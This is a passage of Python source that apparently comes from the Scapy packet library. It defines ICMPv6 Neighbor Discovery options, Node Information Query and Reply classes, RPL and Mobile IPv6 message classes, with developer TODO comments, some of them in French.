# 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py
# 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py
# 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py
# 15: Do Me,
# 16: Do Me,
17: "ICMPv6NDOptIPAddr",
18: "ICMPv6NDOptNewRtrPrefix",
19: "ICMPv6NDOptLLA",
# 18: Do Me,
# 19: Do Me,
# 20: Do Me,
# 21: Do Me,
# 22: Do Me,
23: "ICMPv6NDOptMAP",
24: "ICMPv6NDOptRouteInfo",
25: "ICMPv6NDOptRDNSS",
26: "ICMPv6NDOptEFA",
31: "ICMPv6NDOptDNSSL"
}
icmp6ndraprefs = {0: "Medium (default)",
1: "High",
2: "Reserved",
3: "Low"} # RFC 4191
class _ICMPv6NDGuessPayload:
name = "Dummy ND class that implements guess_payload_class()"
def guess_payload_class(self, p):
if len(p) > 1:
return icmp6ndoptscls.get(orb(p[0]), Raw) # s/Raw/ICMPv6NDOptUnknown/g ? # noqa: E501
# Beginning of ICMPv6 Neighbor Discovery Options.
class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
fields_desc = [ByteField("type", None),
FieldLenField("len", None, length_of="data", fmt="B",
adjust=lambda pkt, x: x + 2),
StrLenField("data", "",
length_from=lambda pkt: pkt.len - 2)]
# NOTE: len includes type and len field. Expressed in unit of 8 bytes
# TODO: Revoir le coup du ETHER_ANY
class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
fields_desc = [ByteField("type", 1),
ByteField("len", 1),
MACField("lladdr", ETHER_ANY)]
def mysummary(self):
return self.sprintf("%name% %lladdr%")
class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
type = 2
class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
fields_desc = [ByteField("type", 3),
ByteField("len", 4),
ByteField("prefixlen", 64),
BitField("L", 1, 1),
BitField("A", 1, 1),
BitField("R", 0, 1),
BitField("res1", 0, 5),
XIntField("validlifetime", 0xffffffff),
XIntField("preferredlifetime", 0xffffffff),
XIntField("res2", 0x00000000),
IP6Field("prefix", "::")]
def mysummary(self):
return self.sprintf("%name% %prefix%/%prefixlen% "
"On-link %L% Autonomous Address %A% "
"Router Address %R%")
# TODO: We should also limit the size of included packet to something
# like (initiallen - 40 - 2)
class TruncPktLenField(PacketLenField):
__slots__ = ["cur_shift"]
def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0): # noqa: E501
PacketLenField.__init__(self, name, default, cls, length_from=length_from) # noqa: E501
self.cur_shift = cur_shift
def getfield(self, pkt, s):
tmp_len = self.length_from(pkt)
i = self.m2i(pkt, s[:tmp_len])
return s[tmp_len:], i
def m2i(self, pkt, m):
s = None
try: # It can happen we have sth shorter than 40 bytes
s = self.cls(m)
except Exception:
return conf.raw_layer(m)
return s
def i2m(self, pkt, x):
s = raw(x)
tmp_len = len(s)
r = (tmp_len + self.cur_shift) % 8
tmp_len = tmp_len - r
return s[:tmp_len]
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
# Faire un post_build pour le recalcul de la taille (en multiple de 8 octets)
class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
fields_desc = [ByteField("type", 4),
FieldLenField("len", None, length_of="pkt", fmt="B",
adjust=lambda pkt, x:(x + 8) // 8),
StrFixedLenField("res", b"\x00" * 6, 6),
TruncPktLenField("pkt", b"", IPv6, 8,
length_from=lambda pkt: 8 * pkt.len - 8)]
# See which value should be used for default MTU instead of 1280
class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - MTU"
fields_desc = [ByteField("type", 5),
ByteField("len", 1),
XShortField("res", 0),
IntField("mtu", 1280)]
def mysummary(self):
return self.sprintf("%name% %mtu%")
class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491
name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
fields_desc = [ByteField("type", 6),
ByteField("len", 1),
ByteField("shortcutlim", 40), # XXX
ByteField("res1", 0),
IntField("res2", 0)]
class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
fields_desc = [ByteField("type", 7),
ByteField("len", 1),
ShortField("res", 0),
IntField("advint", 0)]
def mysummary(self):
return self.sprintf("%name% %advint% milliseconds")
class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Home Agent Information"
fields_desc = [ByteField("type", 8),
ByteField("len", 1),
ShortField("res", 0),
ShortField("pref", 0),
ShortField("lifetime", 1)]
def mysummary(self):
return self.sprintf("%name% %pref% %lifetime% seconds")
# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
fields_desc = [ByteField("type", 17),
ByteField("len", 3),
ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
2: "New Care-Of Address",
3: "NAR's IP address"}),
ByteField("plen", 64),
IntField("res", 0),
IP6Field("addr", "::")]
class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" # noqa: E501
fields_desc = [ByteField("type", 18),
ByteField("len", 3),
ByteField("optcode", 0),
ByteField("plen", 64),
IntField("res", 0),
IP6Field("prefix", "::")]
_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
1: "LLA for the new AP",
2: "LLA of the MN",
3: "LLA of the NAR",
4: "LLA of the src of TrSolPr or PrRtAdv msg",
5: "AP identified by LLA belongs to current iface of router", # noqa: E501
6: "No preifx info available for AP identified by the LLA", # noqa: E501
7: "No fast handovers support for AP identified by the LLA"} # noqa: E501
class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" # noqa: E501
fields_desc = [ByteField("type", 19),
ByteField("len", 1),
ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
MACField("lla", ETHER_ANY)] # We only support ethernet
class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140
name = "ICMPv6 Neighbor Discovery - MAP Option"
fields_desc = [ByteField("type", 23),
ByteField("len", 3),
BitField("dist", 1, 4),
BitField("pref", 15, 4), # highest availability
BitField("R", 1, 1),
BitField("res", 0, 7),
IntField("validlifetime", 0xffffffff),
IP6Field("addr", "::")]
class _IP6PrefixField(IP6Field):
__slots__ = ["length_from"]
def __init__(self, name, default):
IP6Field.__init__(self, name, default)
self.length_from = lambda pkt: 8 * (pkt.len - 1)
def addfield(self, pkt, s, val):
return s + self.i2m(pkt, val)
def getfield(self, pkt, s):
tmp_len = self.length_from(pkt)
p = s[:tmp_len]
if tmp_len < 16:
p += b'\x00' * (16 - tmp_len)
return s[tmp_len:], self.m2i(pkt, p)
def i2len(self, pkt, x):
return len(self.i2m(pkt, x))
def i2m(self, pkt, x):
tmp_len = pkt.len
if x is None:
x = "::"
if tmp_len is None:
tmp_len = 1
x = inet_pton(socket.AF_INET6, x)
if tmp_len is None:
return x
if tmp_len in [0, 1]:
return b""
if tmp_len in [2, 3]:
return x[:8 * (tmp_len - 1)]
return x + b'\x00' * 8 * (tmp_len - 3)
class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191
name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
fields_desc = [ByteField("type", 24),
FieldLenField("len", None, length_of="prefix", fmt="B",
adjust=lambda pkt, x: x // 8 + 1),
ByteField("plen", None),
BitField("res1", 0, 3),
BitEnumField("prf", 0, 2, icmp6ndraprefs),
BitField("res2", 0, 3),
IntField("rtlifetime", 0xffffffff),
_IP6PrefixField("prefix", None)]
def mysummary(self):
return self.sprintf("%name% %prefix%/%plen% Preference %prf%")
class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006
name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
fields_desc = [ByteField("type", 25),
FieldLenField("len", None, count_of="dns", fmt="B",
adjust=lambda pkt, x: 2 * x + 1),
ShortField("res", None),
IntField("lifetime", 0xffffffff),
IP6ListField("dns", [],
length_from=lambda pkt: 8 * (pkt.len - 1))]
def mysummary(self):
return self.sprintf("%name% " + ", ".join(self.dns))
class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075)
name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
fields_desc = [ByteField("type", 26),
ByteField("len", 1),
BitField("res", 0, 48)]
# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
# described in section 3.1 of RFC 1035
# XXX Label should be at most 63 octets in length : we do not enforce it
# Total length of domain should be 255 : we do not enforce it either
class DomainNameListField(StrLenField):
__slots__ = ["padded"]
islist = 1
padded_unit = 8
def __init__(self, name, default, length_from=None, padded=False): # noqa: E501
self.padded = padded
StrLenField.__init__(self, name, default, length_from=length_from)
def i2len(self, pkt, x):
return len(self.i2m(pkt, x))
def m2i(self, pkt, x):
x = plain_str(x) # Decode bytes to string
res = []
while x:
# Get a name until \x00 is reached
cur = []
while x and ord(x[0]) != 0:
tmp_len = ord(x[0])
cur.append(x[1:tmp_len + 1])
x = x[tmp_len + 1:]
if self.padded:
# Discard following \x00 in padded mode
if len(cur):
res.append(".".join(cur) + ".")
else:
# Store the current name
res.append(".".join(cur) + ".")
if x and ord(x[0]) == 0:
x = x[1:]
return res
def i2m(self, pkt, x):
def conditionalTrailingDot(z):
if z and orb(z[-1]) == 0:
return z
return z + b'\x00'
# Build the encode names
tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes # noqa: E501
ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp)
# In padded mode, add some \x00 bytes
if self.padded and not len(ret_string) % self.padded_unit == 0:
ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit) # noqa: E501
return ret_string
class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106
name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
fields_desc = [ByteField("type", 31),
FieldLenField("len", None, length_of="searchlist", fmt="B",
adjust=lambda pkt, x: 1 + x // 8),
ShortField("res", None),
IntField("lifetime", 0xffffffff),
DomainNameListField("searchlist", [],
length_from=lambda pkt: 8 * pkt.len - 8,
padded=True)
]
def mysummary(self):
return self.sprintf("%name% " + ", ".join(self.searchlist))
# End of ICMPv6 Neighbor Discovery Options.
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Solicitation"
fields_desc = [ByteEnumField("type", 133, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
IntField("res", 0)]
overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}}
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Advertisement"
fields_desc = [ByteEnumField("type", 134, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
ByteField("chlim", 0),
BitField("M", 0, 1),
BitField("O", 0, 1),
BitField("H", 0, 1),
BitEnumField("prf", 1, 2, icmp6ndraprefs), # RFC 4191
BitField("P", 0, 1),
BitField("res", 0, 2),
ShortField("routerlifetime", 1800),
IntField("reachabletime", 0),
IntField("retranstimer", 0)]
overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
def answers(self, other):
return isinstance(other, ICMPv6ND_RS)
def mysummary(self):
return self.sprintf("%name% Lifetime %routerlifetime% "
"Hop Limit %chlim% Preference %prf% "
"Managed %M% Other %O% Home %H%")
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
fields_desc = [ByteEnumField("type", 135, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
IntField("res", 0),
IP6Field("tgt", "::")]
overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return bytes_encode(self.tgt) + self.payload.hashret()
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
fields_desc = [ByteEnumField("type", 136, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
BitField("R", 1, 1),
BitField("S", 0, 1),
BitField("O", 1, 1),
XBitField("res", 0, 29),
IP6Field("tgt", "::")]
overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return bytes_encode(self.tgt) + self.payload.hashret()
def answers(self, other):
return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
# associated possible options : target link-layer option, Redirected header
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Redirect"
fields_desc = [ByteEnumField("type", 137, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XIntField("res", 0),
IP6Field("tgt", "::"),
IP6Field("dst", "::")]
overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
# ICMPv6 Inverse Neighbor Discovery (RFC 3122) #
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
fields_desc = [ByteField("type", 9),
FieldLenField("len", None, count_of="addrlist", fmt="B",
adjust=lambda pkt, x: 2 * x + 1),
StrFixedLenField("res", b"\x00" * 6, 6),
IP6ListField("addrlist", [],
length_from=lambda pkt: 8 * (pkt.len - 1))]
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
type = 10
# RFC3122
# Options requises : source lladdr et target lladdr
# Autres options valides : source address list, MTU
# - Comme precise dans le document, il serait bien de prendre l'adresse L2
# demandee dans l'option requise target lladdr et l'utiliser au niveau
# de l'adresse destination ethernet si aucune adresse n'est precisee
# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes
# les options.
# Ether() must use the target lladdr as destination
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
fields_desc = [ByteEnumField("type", 141, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XIntField("reserved", 0)]
overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
# Options requises : target lladdr, target address list
# Autres options valides : MTU
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
fields_desc = [ByteEnumField("type", 142, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XIntField("reserved", 0)]
overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
###############################################################################
# ICMPv6 Node Information Queries (RFC 4620)
###############################################################################
# [ ] Add automatic destination address computation using computeNIGroupAddr
# in IPv6 class (Scapy6 modification when integrated) if :
# - it is not provided
# - upper layer is ICMPv6NIQueryName() with a valid value
# [ ] Try to be liberal in what we accept as internal values for _explicit_
# DNS elements provided by users. Any string should be considered
# valid and kept like it has been provided. At the moment, i2repr() will
# crash on many inputs
# [ ] Do the documentation
# [ ] Add regression tests
# [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501
# [ ] Check if there are differences between different stacks. Among *BSD,
# with others.
# [ ] Deal with flags in a consistent way.
# [ ] Implement compression in names2dnsrepr() and decompresiion in
# dnsrepr2names(). Should be deactivable.
icmp6_niqtypes = {0: "NOOP",
2: "Node Name",
3: "IPv6 Address",
4: "IPv4 Address"}
class _ICMPv6NIHashret:
def hashret(self):
return bytes_encode(self.nonce)
class _ICMPv6NIAnswers:
def answers(self, other):
return self.nonce == other.nonce
# Buggy; always returns the same value during a session
class NonceField(StrFixedLenField):
def __init__(self, name, default=None):
StrFixedLenField.__init__(self, name, default, 8)
if default is None:
self.default = self.randval()
@conf.commands.register
def computeNIGroupAddr(name):
"""Compute the NI group Address. Can take a FQDN as input parameter"""
name = name.lower().split(".")[0]
record = chr(len(name)) + name
h = md5(record.encode("utf8"))
h = h.digest()
addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
return addr
# Here is the deal. First, that protocol is a piece of shit. Then, we
# provide 4 classes for the different kinds of Requests (one for every
# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
# data field class that is made to be smart by guessing the specific
# type of value provided :
#
# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
# if not overridden by user
# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
# if not overridden
# - Name in the other cases: code is set to 0, if not overridden by user
#
# Internal storage, is not only the value, but the a pair providing
# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@)
#
# Note : I merged getfield() and m2i(). m2i() should not be called
# directly anyway. Same remark for addfield() and i2m()
#
# -- arno
# "The type of information present in the Data field of a query is
# declared by the ICMP Code, whereas the type of information in a
# Reply is determined by the Qtype"
def names2dnsrepr(x):
"""
Take as input a list of DNS names or a single DNS name
and encode it in DNS format (with possible compression)
If a string that is already a DNS name in DNS format
is passed, it is returned unmodified. Result is a string.
!!! At the moment, compression is not implemented !!!
"""
if isinstance(x, bytes):
if x and x[-1:] == b'\x00': # stupid heuristic
return x
x = [x]
res = []
for n in x:
termin = b"\x00"
if n.count(b'.') == 0: # single-component gets one more
termin += b'\x00'
n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin
res.append(n)
return b"".join(res)
def dnsrepr2names(x):
"""
Take as input a DNS encoded string (possibly compressed)
and returns a list of DNS names contained in it.
If provided string is already in printable format
(does not end with a null character, a one element list
is returned). Result is a list.
"""
res = []
cur = b""
while x:
tmp_len = orb(x[0])
x = x[1:]
if not tmp_len:
if cur and cur[-1:] == b'.':
cur = cur[:-1]
res.append(cur)
cur = b""
if x and orb(x[0]) == 0: # single component
x = x[1:]
continue
if tmp_len & 0xc0: # XXX TODO : work on that -- arno
raise Exception("DNS message can't be compressed at this point!")
cur += x[:tmp_len] + b"."
x = x[tmp_len:]
return res
class NIQueryDataField(StrField):
def __init__(self, name, default):
StrField.__init__(self, name, default)
def i2h(self, pkt, x):
if x is None:
return x
t, val = x
if t == 1:
val = dnsrepr2names(val)[0]
return val
def h2i(self, pkt, x):
if x is tuple and isinstance(x[0], int):
return x
# Try IPv6
try:
inet_pton(socket.AF_INET6, x.decode())
return (0, x.decode())
except Exception:
pass
# Try IPv4
try:
inet_pton(socket.AF_INET, x.decode())
return (2, x.decode())
except Exception:
pass
# Try DNS
if x is None:
x = b""
x = names2dnsrepr(x)
return (1, x)
def i2repr(self, pkt, x):
t, val = x
if t == 1: # DNS Name
# we don't use dnsrepr2names() to deal with
# possible weird data extracted info
res = []
while val:
tmp_len = orb(val[0])
val = val[1:]
if tmp_len == 0:
break
res.append(plain_str(val[:tmp_len]) + ".")
val = val[tmp_len:]
tmp = "".join(res)
if tmp and tmp[-1] == '.':
tmp = tmp[:-1]
return tmp
return repr(val)
def getfield(self, pkt, s):
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, b"")
else:
code = getattr(pkt, "code")
if code == 0: # IPv6 Addr
return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
elif code == 2: # IPv4 Addr
return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
else: # Name or Unknown
return b"", (1, s)
def addfield(self, pkt, s, val):
if ((isinstance(val, tuple) and val[1] is None) or
val is None):
val = (1, b"")
t = val[0]
if t == 1:
return s + val[1]
elif t == 0:
return s + inet_pton(socket.AF_INET6, val[1])
else:
return s + inet_pton(socket.AF_INET, val[1])
class NIQueryCodeField(ByteEnumField):
def i2m(self, pkt, x):
if x is None:
d = pkt.getfieldval("data")
if d is None:
return 1
elif d[0] == 0: # IPv6 address
return 0
elif d[0] == 1: # Name
return 1
elif d[0] == 2: # IPv4 address
return 2
else:
return 1
return x
_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
# _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
# 8: "Link-local addresses", 16: "Site-local addresses",
# 32: "Global addresses" }
# "This NI type has no defined flags and never has a Data Field". Used
# to know if the destination is up and implements NI protocol.
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Query - NOOP Query"
fields_desc = [ByteEnumField("type", 139, icmp6types),
NIQueryCodeField("code", None, _niquery_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIQueryDataField("data", None)]
class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Name Query"
qtype = 2
# We ask for the IPv6 address of the peer
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Address Query"
qtype = 3
flags = 0x3E
class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv4 Address Query"
qtype = 4
_nireply_code = {0: "Successful Reply",
1: "Response Refusal",
3: "Unknown query type"}
_nireply_flags = {1: "Reply set incomplete",
2: "All unicast addresses",
4: "IPv4 addresses",
8: "Link-local addresses",
16: "Site-local addresses",
32: "Global addresses"}
# Internal repr is one of those :
# (0, "some string") : unknown qtype value are mapped to that one
# (3, [ (ttl, ip6), ... ])
# (4, [ (ttl, ip4), ... ])
# (2, [ttl, dns_names]) : dns_names is one string that contains
# all the DNS names. Internally it is kept ready to be sent
# (undissected). i2repr() decode it for user. This is to
# make build after dissection bijective.
#
# I also merged getfield() and m2i(), and addfield() and i2m().
class NIReplyDataField(StrField):
def i2h(self, pkt, x):
if x is None:
return x
t, val = x
if t == 2:
ttl, dnsnames = val
val = [ttl] + dnsrepr2names(dnsnames)
return val
def h2i(self, pkt, x):
qtype = 0 # We will decode it as string if not
# overridden through 'qtype' in pkt
# No user hint, let's use 'qtype' value for that purpose
if not isinstance(x, tuple):
if pkt is not None:
qtype = pkt.qtype
else:
qtype = x[0]
x = x[1]
# From that point on, x is the value (second element of the tuple)
if qtype == 2: # DNS name
if isinstance(x, (str, bytes)): # listify the string
x = [x]
if isinstance(x, list):
x = [val.encode() if isinstance(val, str) else val for val in x] # noqa: E501
if x and isinstance(x[0], six.integer_types):
ttl = x[0]
names = x[1:]
else:
ttl = 0
names = x
return (2, [ttl, names2dnsrepr(names)])
elif qtype in [3, 4]: # IPv4 or IPv6 addr
if not isinstance(x, list):
x = [x] # User directly provided an IP, instead of list
def fixvalue(x):
# List elements are not tuples, user probably
# omitted ttl value : we will use 0 instead
if not isinstance(x, tuple):
x = (0, x)
# Decode bytes
if six.PY3 and isinstance(x[1], bytes):
x = (x[0], x[1].decode())
return x
return (qtype, [fixvalue(d) for d in x])
return (qtype, x)
def addfield(self, pkt, s, val):
t, tmp = val
if tmp is None:
tmp = b""
if t == 2:
ttl, dnsstr = tmp
return s + struct.pack("!I", ttl) + dnsstr
elif t == 3:
return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp)) # noqa: E501
elif t == 4:
return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp)) # noqa: E501
else:
return s + tmp
def getfield(self, pkt, s):
code = getattr(pkt, "code")
if code != 0:
return s, (0, b"")
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, b"")
elif qtype == 2:
if len(s) < 4:
return s, (0, b"")
ttl = struct.unpack("!I", s[:4])[0]
return b"", (2, [ttl, s[4:]])
elif qtype == 3: # IPv6 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 20: # 4 + 16
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET6, s[4:20])
res.append((ttl, ip))
s = s[20:]
return s, (3, res)
elif qtype == 4: # IPv4 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 8: # 4 + 4
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET, s[4:8])
res.append((ttl, ip))
s = s[8:]
return s, (4, res)
else:
# XXX TODO : implement me and deal with real length
return b"", (0, s)
def i2repr(self, pkt, x):
if x is None:
return "[]"
if isinstance(x, tuple) and len(x) == 2:
t, val = x
if t == 2: # DNS names
ttl, tmp_len = val
tmp_len = dnsrepr2names(tmp_len)
names_list = (plain_str(name) for name in tmp_len)
return "ttl:%d %s" % (ttl, ",".join(names_list))
elif t == 3 or t == 4:
return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val))) # noqa: E501
return repr(val)
return repr(x) # XXX should not happen
# By default, sent responses have code set to 0 (successful)
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Reply - NOOP Reply"
fields_desc = [ByteEnumField("type", 140, icmp6types),
ByteEnumField("code", 0, _nireply_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIReplyDataField("data", None)]
class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Node Names"
qtype = 2
class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv6 addresses"
qtype = 3
class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv4 addresses"
qtype = 4
class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
code = 1
class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
code = 2
def _niquery_guesser(p):
cls = conf.raw_layer
type = orb(p[0])
if type == 139: # Node Info Query specific stuff
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = {0: ICMPv6NIQueryNOOP,
2: ICMPv6NIQueryName,
3: ICMPv6NIQueryIPv6,
4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer)
elif type == 140: # Node Info Reply specific stuff
code = orb(p[1])
if code == 0:
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = {2: ICMPv6NIReplyName,
3: ICMPv6NIReplyIPv6,
4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP)
elif code == 1:
cls = ICMPv6NIReplyRefuse
elif code == 2:
cls = ICMPv6NIReplyUnknown
return cls
#############################################################################
#############################################################################
# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) #
#############################################################################
#############################################################################
# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes
rplcodes = {0: "DIS",
1: "DIO",
2: "DAO",
3: "DAO-ACK",
# 4: "P2P-DRO",
# 5: "P2P-DRO-ACK",
# 6: "Measurement",
7: "DCO",
8: "DCO-ACK"}
class ICMPv6RPL(_ICMPv6): # RFC 6550
name = 'RPL'
fields_desc = [ByteEnumField("type", 155, icmp6types),
ByteEnumField("code", 0, rplcodes),
XShortField("cksum", None)]
overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}}
#############################################################################
#############################################################################
# Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) #
#############################################################################
#############################################################################
# Mobile IPv6 ICMPv6 related classes
class ICMPv6HAADRequest(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Request'
fields_desc = [ByteEnumField("type", 144, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15)]
def hashret(self):
return struct.pack("!H", self.id) + self.payload.hashret()
class ICMPv6HAADReply(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Reply'
fields_desc = [ByteEnumField("type", 145, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15),
IP6ListField('addresses', None)]
def hashret(self):
return struct.pack("!H", self.id) + self.payload.hashret()
def answers(self, other):
if not isinstance(other, ICMPv6HAADRequest):
return 0
return self.id == other.id
class ICMPv6MPSol(_ICMPv6):
name = 'ICMPv6 Mobile Prefix Solicitation'
fields_desc = [ByteEnumField("type", 146, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
XShortField("res", 0)]
def _hashret(self):
